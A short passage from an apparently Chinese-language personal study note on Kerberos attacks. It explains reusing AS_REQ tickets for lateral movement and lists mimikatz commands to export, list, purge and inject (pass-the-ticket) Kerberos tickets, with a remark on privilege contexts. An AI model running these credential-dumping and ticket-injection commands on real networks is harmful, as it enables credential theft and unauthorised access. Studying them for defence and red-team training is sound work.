两个步骤全是通过AS_REQ拿到的票据进行验证,那么完全可以只用这张票据来进行横向。
mimikatz使用
sekurlsa::tickets /export // 导出本机票据
kerberos::list // 查看本机票据
kerberos::purge // 清除本机所有票据
kerberos::ptt c:\[0;86e204][email protected] // 导入票据
这里需要注意:我当前是win7普通本地管理员用户,mimikatz是用管理员权限起来的,那么在普通权限的cmd中klist是看不到mimikatz导入的票据的。踩了个大坑。
放到后面和黄金票据一起说。
因为没有搭建好委派的环境,而且理解的非常不透彻,所以下面的几部分都拖一拖。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。